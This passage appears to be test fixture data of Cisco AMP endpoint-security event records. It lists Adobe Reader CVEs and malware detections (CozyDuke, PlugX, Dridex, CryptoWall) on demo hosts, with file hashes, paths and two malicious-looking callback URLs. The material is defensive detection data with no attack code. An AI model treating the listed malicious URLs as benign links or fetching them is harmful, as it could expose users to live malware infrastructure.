Reader","version":"9.3.3.177","cve":"CVE-2013-0614","score":10,"url":"https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2013-0614"},{"name":"Adobe Acrobat Reader","version":"9.3.3.177","cve":"CVE-2013-0615","score":10,"url":"https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2013-0615"},{"name":"Adobe Acrobat Reader","version":"9.3.3.177","cve":"CVE-2013-0616","score":10,"url":"https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2013-0616"},{"name":"Adobe Acrobat Reader","version":"9.3.3.177","cve":"CVE-2013-0617","score":10,"url":"https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2013-0617"},{"name":"Adobe Acrobat Reader","version":"9.3.3.177","cve":"CVE-2013-0618","score":10,"url":"https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2013-0618"},{"name":"Adobe Acrobat Reader","version":"9.3.3.177","cve":"CVE-2013-0619","score":10,"url":"https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2013-0619"},{"name":"Adobe Acrobat Reader","version":"9.3.3.177","cve":"CVE-2013-0620","score":10,"url":"https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2013-0620"},{"name":"Adobe Acrobat Reader","version":"9.3.3.177","cve":"CVE-2013-0621","score":10,"url":"https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2013-0621"},{"name":"Adobe Acrobat Reader","version":"9.3.3.177","cve":"CVE-2013-0622","score":10,"url":"https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2013-0622"},{"name":"Adobe Acrobat Reader","version":"9.3.3.177","cve":"CVE-2013-0623","score":10,"url":"https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2013-0623"},{"name":"Adobe Acrobat Reader","version":"9.3.3.177","cve":"CVE-2013-0624","score":10,"url":"https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2013-0624"},{"name":"Adobe Acrobat Reader","version":"9.3.3.177","cve":"CVE-2013-0626","score":10,"url":"https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2013-0626"},{"name":"Adobe Acrobat Reader","version":"9.3.3.177","cve":"CVE-2013-3346","score":10,"url":"https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2013-3346"},{"name":"Adobe Acrobat Reader","version":"9.3.3.177","cve":"CVE-2013-3342","score":10,"url":"https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2013-3342"},{"name":"Adobe Acrobat Reader","version":"9.3.3.177","cve":"CVE-2013-3341","score":10,"url":"https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2013-3341"},{"name":"Adobe Acrobat Reader","version":"9.3.3.177","cve":"CVE-2013-1376","score":10,"url":"https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2013-1376"},{"name":"Adobe Acrobat Reader","version":"9.3.3.177","cve":"CVE-2013-2718","score":10,"url":"https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2013-2718"},{"name":"Adobe Acrobat Reader","version":"9.3.3.177","cve":"CVE-2013-2719","score":10,"url":"https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2013-2719"},{"name":"Adobe Acrobat Reader","version":"9.3.3.177","cve":"CVE-2013-2720","score":10,"url":"https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2013-2720"},{"name":"Adobe Acrobat Reader","version":"9.3.3.177","cve":"CVE-2013-2721","score":10,"url":"https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2013-2721"},{"name":"Adobe Acrobat Reader","version":"9.3.3.177","cve":"CVE-2013-2722","score":10,"url":"https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2013-2722"},{"name":"Adobe Acrobat Reader","version":"9.3.3.177","cve":"CVE-2013-2723","score":10,"url":"https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2013-2723"},{"name":"Adobe Acrobat Reader","version":"9.3.3.177","cve":"CVE-2013-2724","score":10,"url":"https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2013-2724"},{"name":"Adobe Acrobat Reader","version":"9.3.3.177","cve":"CVE-2013-2725","score":10,"url":"https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2013-2725"},{"name":"Adobe Acrobat Reader","version":"9.3.3.177","cve":"CVE-2013-2726","score":10,"url":"https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2013-2726"},{"name":"Adobe Acrobat Reader","version":"9.3.3.177","cve":"CVE-2013-2727","score":10,"url":"https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2013-2727"},{"name":"Adobe Acrobat Reader","version":"9.3.3.177","cve":"CVE-2013-2729","score":10,"url":"https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2013-2729"},{"name":"Adobe Acrobat Reader","version":"9.3.3.177","cve":"CVE-2013-2730","score":10,"url":"https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2013-2730"},{"name":"Adobe Acrobat Reader","version":"9.3.3.177","cve":"CVE-2013-2731","score":10,"url":"https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2013-2731"},{"name":"Adobe Acrobat Reader","version":"9.3.3.177","cve":"CVE-2013-2732","score":10,"url":"https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2013-2732"},{"name":"Adobe Acrobat Reader","version":"9.3.3.177","cve":"CVE-2013-2733","score":10,"url":"https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2013-2733"},{"name":"Adobe Acrobat Reader","version":"9.3.3.177","cve":"CVE-2013-2734","score":10,"url":"https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2013-2734"},{"name":"Adobe Acrobat Reader","version":"9.3.3.177","cve":"CVE-2013-2735","score":10,"url":"https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2013-2735"},{"name":"Adobe Acrobat Reader","version":"9.3.3.177","cve":"CVE-2013-2736","score":10,"url":"https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2013-2736"},{"name":"Adobe Acrobat Reader","version":"9.3.3.177","cve":"CVE-2013-3340","score":10,"url":"https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2013-3340"},{"name":"Adobe Acrobat Reader","version":"9.3.3.177","cve":"CVE-2013-3337","score":10,"url":"https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2013-3337"},{"name":"Adobe Acrobat Reader","version":"9.3.3.177","cve":"CVE-2013-3338","score":10,"url":"https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2013-3338"},{"name":"Adobe Acrobat Reader","version":"9.3.3.177","cve":"CVE-2013-3339","score":10,"url":"https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2013-3339"},{"name":"Adobe Acrobat Reader","version":"9.3.3.177","cve":"CVE-2013-0641","score":9.3,"url":"https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2013-0641"},{"name":"Adobe Acrobat Reader","version":"9.3.3.177","cve":"CVE-2013-0640","score":9.3,"url":"https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2013-0640"},{"name":"Adobe Acrobat Reader","version":"9.3.3.177","cve":"CVE-2013-0627","score":7.2,"url":"https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2013-0627"}]}} +{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500","next":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500"},"results":{"total":972,"current_item_count":500,"index":0,"items_per_page":500}},"data":{"id":6155906243727720000,"timestamp":1610704934,"timestamp_nanoseconds":396000000,"date":"2021-01-15T10:02:14+00:00","event_type":"Threat Detected","event_type_id":1090519054,"detection":"W32.Trojan.PlugX.72.tht.VRT","detection_id":"6155906243727720449","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_Plugx","external_ip":"8.8.8.8","user":"user@testdomain.com","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"98:0d:93:45:27:11"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"ps.exe","file_path":"\\\\?\\C:\\Documents and Settings\\John Smith\\Desktop\\ps.exe","identity":{"sha256":"ff4592e89b434b3fca5dabd5210d9bf17ae8c1d912c2d29007c55dbea0aa8cae","sha1":"080cf73cdd9a318f958cd5e730579d84d6a1cd26","md5":"2b88f6504fd54bbc454031f255a97cdf"},"archived_file":{"disposition":"Malicious","identity":{"sha256":"0a99238e1ebebc47d7a89b2ccddfae537479f7f77322b5d4941315d3f7e5ca48"}},"parent":{"process_id":3896,"disposition":"Clean","file_name":"iexplore.exe","identity":{"sha256":"b18a0d4beba606bf30f5010ba3c72abafac80d5f303a8bffb24d7f7b78b786e6","sha1":"eadce51c88c8261852c1903399dde742fba2061b","md5":"b60dddd2d63ce41cb8c487fcfbb6419e"}}}}} +{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500","next":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500"},"results":{"total":972,"current_item_count":500,"index":0,"items_per_page":500}},"data":{"id":5825615424644973000,"timestamp":1610704922,"timestamp_nanoseconds":703000000,"date":"2021-01-15T10:02:02+00:00","event_type":"Policy Update","event_type_id":553648130,"connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"computer":{"connector_guid":"test_connector_guid","hostname":"Demo_TDSS","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"c6:4e:72:6f:69:14"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}}}} +{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500","next":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500"},"results":{"total":972,"current_item_count":500,"index":0,"items_per_page":500}},"data":{"id":1443112390223000800,"timestamp":1610704898,"timestamp_nanoseconds":965000000,"date":"2021-01-15T10:01:38+00:00","event_type":"Cloud IOC","event_type_id":1107296274,"connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"High","start_timestamp":1610704898,"start_date":"2021-01-15T10:01:38+00:00","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_CryptoWall","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"ce:32:02:72:9b:c8"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"cloud_ioc":{"description":"Accessed URL matches characteristics of several malware families.","short_description":"GateDotPhp.ioc"},"network_info":{"dirty_url":"http://flashtamp.info/datas/gate.php","parent":{"disposition":"Clean","identity":{"sha256":"72c027273297ccf2f33f5b4c5f5bce3eecc69e5f78b6bbc1dec9e58780a6fd02"}}}}} +{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500","next":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500"},"results":{"total":972,"current_item_count":500,"index":0,"items_per_page":500}},"data":{"id":1443112389350000600,"timestamp":1610704885,"timestamp_nanoseconds":350000000,"date":"2021-01-15T10:01:25+00:00","event_type":"Cloud IOC","event_type_id":1107296274,"connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","start_timestamp":1610704885,"start_date":"2021-01-15T10:01:25+00:00","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_CryptoWall","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"ce:32:02:72:9b:c8"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"cloud_ioc":{"description":"Svchost.exe accessed a Wordpress URL - this is anomalous and indicative of a process injection.","short_description":"W32.SvchostHitWordpressURL.ioc"},"network_info":{"dirty_url":"http://laptopsinhvien.net/wp-content/plugins/better-wp-security/modules/free/brute-force/js/ap3.php?t=i3fktdvzoauf","parent":{"disposition":"Clean","identity":{"sha256":"cb2bc00985f641f9900aa0adc5fc203eaaf57394412dc4ce4b37222ef519205f"}}}}} +{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500","next":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500"},"results":{"total":972,"current_item_count":500,"index":0,"items_per_page":500}},"data":{"id":6156208098324251000,"timestamp":1610704881,"timestamp_nanoseconds":90000000,"date":"2021-01-15T10:01:21+00:00","event_type":"Threat Detected","event_type_id":1090519054,"detection":"W32.DFC.MalParent","detection_id":"6156208098324250639","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_Dridex","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"23:8a:fc:e3:35:8c"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"4543543.exe","file_path":"C:\\Users\\ADMINI~1\\AppData\\Local\\Temp\\4543543.exe","identity":{"sha256":"7c9d5724064693dfeef76fd4da8d6f159ef0e6707e67c4a692a03e94f4a6e27a","sha1":"fc5d6fc2cbb1d95864f5ed26b50e4ebe68333eab","md5":"107a3bef0da9ab2b42e3e0f9f843093b"}}}} +{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500","next":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500"},"results":{"total":972,"current_item_count":500,"index":0,"items_per_page":500}},"data":{"id":6156292803669262000,"timestamp":1610704872,"timestamp_nanoseconds":682000000,"date":"2021-01-15T10:01:12+00:00","event_type":"Threat Detected","event_type_id":1090519054,"detection":"W32.Generic:CozyDukeB.18fx.1201","detection_id":"6156292803669262360","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_CozyDuke","external_ip":"8.8.8.8","user":"user@testdomain.com","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"61:24:2f:67:93:6e"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"player.exe","file_path":"\\\\?\\C:\\Users\\ADMINI~1\\AppData\\Local\\Temp\\player.exe","identity":{"sha256":"01468b1d3e089985a4ed255b6594d24863cfd94a647329c631e4f4e52759f8a9"},"parent":{"process_id":3052,"disposition":"Malicious","file_name":"monkeys.swf.exe","identity":{"sha256":"7fd72a36f7e0e6e0a8bc777fc9ed41e0a6d5526c98bc95a09e189531cf7e70d5","sha1":"75aeaee253b5c8ae701195e3b0f49308f3d1d932","md5":"95b3ec0a4e539efaa1faa3d4e25d51de"}}}}} +{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500","next":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500"},"results":{"total":972,"current_item_count":500,"index":0,"items_per_page":500}},"data":{"id":6156292803669262000,"timestamp":1610704872,"timestamp_nanoseconds":35000000,"date":"2021-01-15T10:01:12+00:00","event_type":"Threat Detected","event_type_id":1090519054,"detection":"W32.Generic:KCX.18fv.1201","detection_id":"6156292803669262359","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_CozyDuke","external_ip":"8.8.8.8","user":"user@testdomain.com","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"61:24:2f:67:93:6e"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"amdhcp32.dll","file_path":"\\\\?\\C:\\Users\\Administrator\\AppData\\Roaming\\ATI_Subsystem\\amdhcp32.dll","identity":{"sha256":"37ceea0922d1177a9de74f4858678acf6afd22706489fcca35a509bca9688cb7","sha1":"00f67deb6e435c68f8a39336c9effc45d395b134","md5":"6761106f816313394a653db5172dc487"}}}} +{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500","next":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500"},"results":{"total":972,"current_item_count":500,"index":0,"items_per_page":500}},"data":{"id":6156292803669262000,"timestamp":1610704872,"timestamp_nanoseconds":33000000,"date":"2021-01-15T10:01:12+00:00","event_type":"Threat Detected","event_type_id":1090519054,"detection":"W32.0DC7438BE5-100.SBX.VIOC","detection_id":"6156292803669262356","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_CozyDuke","external_ip":"8.8.8.8","user":"user@testdomain.com","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"61:24:2f:67:93:6e"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"aticaldd.dll","file_path":"\\\\?\\C:\\Users\\Administrator\\AppData\\Roaming\\ATI_Subsystem\\aticaldd.dll","identity":{"sha256":"0dc7438be5b21a36651de0a08361b18d76f0920517a7d51f75dc234740f392ca","sha1":"42cfe068b0f476198b93393840d400424fd77f0c","md5":"d596827d48a3ff836545b3a999f2c3e3"}}}} +{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500","next":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500"},"results":{"total":972,"current_item_count":500,"index":0,"items_per_page":500}},"data":{"id":6156292803669262000,"timestamp":1610704872,"timestamp_nanoseconds":27000000,"date":"2021-01-15T10:01:12+00:00","event_type":"Threat Detected","event_type_id":1090519054,"detection":"W32.File.MalParent","detection_id":"6156292803669262358","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_CozyDuke","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"61:24:2f:67:93:6e"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"player.exe","file_path":"\\\\?\\C:\\Users\\ADMINI~1\\AppData\\Local\\Temp\\player.exe","identity":{"sha256":"01468b1d3e089985a4ed255b6594d24863cfd94a647329c631e4f4e52759f8a9"}}}} +{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500","next":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500"},"results":{"total":972,"current_item_count":500,"index":0,"items_per_page":500}},"data":{"id":6156292803669262000,"timestamp":1610704872,"timestamp_nanoseconds":13000000,"date":"2021-01-15T10:01:12+00:00","event_type":"Threat Detected","event_type_id":1090519054,"detection":"W32.File.MalParent","detection_id":"6156292803669262357","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_CozyDuke","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"61:24:2f:67:93:6e"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"player.exe","file_path":"\\\\?\\C:\\Users\\ADMINI~1\\AppData\\Local\\Temp\\player.exe","identity":{"sha256":"01468b1d3e089985a4ed255b6594d24863cfd94a647329c631e4f4e52759f8a9"}}}} +{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500","next":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500"},"results":{"total":972,"current_item_count":500,"index":0,"items_per_page":500}},"data":{"id":6156292799374295000,"timestamp":1610704871,"timestamp_nanoseconds":984000000,"date":"2021-01-15T10:01:11+00:00","event_type":"Threat Detected","event_type_id":1090519054,"detection":"W32.Generic:Cozer.18fv.1201","detection_id":"6156292799374295059","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_CozyDuke","external_ip":"8.8.8.8","user":"user@testdomain.com","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"61:24:2f:67:93:6e"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"atiumdag.dll","file_path":"\\\\?\\C:\\Users\\Administrator\\AppData\\Roaming\\ATI_Subsystem\\atiumdag.dll","identity":{"sha256":"8853979fce0f767b495abd55b696203209e95f04aaefe16c52c1724d07972154","sha1":"883292f00e5836f99a1943a6e0164d8c6c124478","md5":"bc626c8f11ed753f33ad1c0fe848d898"}}}} +{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500","next":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500"},"results":{"total":972,"current_item_count":500,"index":0,"items_per_page":500}},"data":{"id":6156292799374295000,"timestamp":1610704871,"timestamp_nanoseconds":942000000,"date":"2021-01-15T10:01:11+00:00","event_type":"Threat Detected","event_type_id":1090519054,"detection":"W32.Generic:KCX.18fv.1201","detection_id":"6156292799374295058","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_CozyDuke","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"61:24:2f:67:93:6e"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"player.exe","file_path":"\\\\?\\C:\\Users\\ADMINI~1\\AppData\\Local\\Temp\\player.exe","identity":{"sha256":"01468b1d3e089985a4ed255b6594d24863cfd94a647329c631e4f4e52759f8a9"}}}} +{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500","next":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500"},"results":{"total":972,"current_item_count":500,"index":0,"items_per_page":500}},"data":{"id":6156292799374295000,"timestamp":1610704871,"timestamp_nanoseconds":937000000,"date":"2021-01-15T10:01:11+00:00","event_type":"Threat Detected","event_type_id":1090519054,"detection":"W32.0DC7438BE5-100.SBX.VIOC","detection_id":"6156292799374295057","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_CozyDuke","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"61:24:2f:67:93:6e"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"player.exe","file_path":"\\\\?\\C:\\Users\\ADMINI~1\\AppData\\Local\\Temp\\player.exe","identity":{"sha256":"01468b1d3e089985a4ed255b6594d24863cfd94a647329c631e4f4e52759f8a9"}}}} +{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500","next":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500"},"results":{"total":972,"current_item_count":500,"index":0,"items_per_page":500}},"data":{"id":6156292799374295000,"timestamp":1610704871,"timestamp_nanoseconds":931000000,"date":"2021-01-15T10:01:11+00:00","event_type":"Threat Detected","event_type_id":1090519054,"detection":"W32.Generic:Cozer.18fv.1201","detection_id":"6156292799374295056","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_CozyDuke","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"61:24:2f:67:93:6e"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"player.exe","file_path":"\\\\?\\C:\\Users\\ADMINI~1\\AppData\\Local\\Temp\\player.exe","identity":{"sha256":"01468b1d3e089985a4ed255b6594d24863cfd94a647329c631e4f4e52759f8a9"}}}} +{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500","next":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500"},"results":{"total":972,"current_item_count":500,"index":0,"items_per_page":500}},"data":{"id":6156292799374295000,"timestamp":1610704871,"timestamp_nanoseconds":917000000,"date":"2021-01-15T10:01:11+00:00","event_type":"Threat Detected","event_type_id":1090519054,"detection":"W32.Generic:CozyDukeB.18fx.1201","detection_id":"6156292799374295055","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_CozyDuke","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"61:24:2f:67:93:6e"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"player.exe","file_path":"\\\\?\\C:\\Users\\ADMINI~1\\AppData\\Local\\Temp\\player.exe","identity":{"sha256":"01468b1d3e089985a4ed255b6594d24863cfd94a647329c631e4f4e52759f8a9"}}}} +{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500","next":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500"},"results":{"total":972,"current_item_count":500,"index":0,"items_per_page":500}},"data":{"id":6156292799374295000,"timestamp":1610704871,"timestamp_nanoseconds":863000000,"date":"2021-01-15T10:01:11+00:00","event_type":"Threat Detected","event_type_id":1090519054,"detection":"W32.Generic:CozyDukeB.18fx.1201","detection_id":"6156292799374295054","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_CozyDuke","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"61:24:2f:67:93:6e"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"player.exe","file_path":"\\\\?\\C:\\Users\\ADMINI~1\\AppData\\Local\\Temp\\player.exe","identity":{"sha256":"01468b1d3e089985a4ed255b6594d24863cfd94a647329c631e4f4e52759f8a9"}}}} +{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500","next":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500"},"results":{"total":972,"current_item_count":500,"index":0,"items_per_page":500}},"data":{"id":6156292799374295000,"timestamp":1610704871,"timestamp_nanoseconds":776000000,"date":"2021-01-15T10:01:11+00:00","event_type":"Threat Detected","event_type_id":1090519054,"detection":"W32.Generic:CozyDukeB.18fx.1201","detection_id":"6156292799374295053","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_CozyDuke","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"61:24:2f:67:93:6e"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"player.exe","file_path":"\\\\?\\C:\\Users\\ADMINI~1\\AppData\\Local\\Temp\\player.exe","identity":{"sha256":"01468b1d3e089985a4ed255b6594d24863cfd94a647329c631e4f4e52759f8a9"}}}} +{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500","next":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500"},"results":{"total":972,"current_item_count":500,"index":0,"items_per_page":500}},"data":{"id":6156292799374295000,"timestamp":1610704871,"timestamp_nanoseconds":767000000,"date":"2021-01-15T10:01:11+00:00","event_type":"Threat 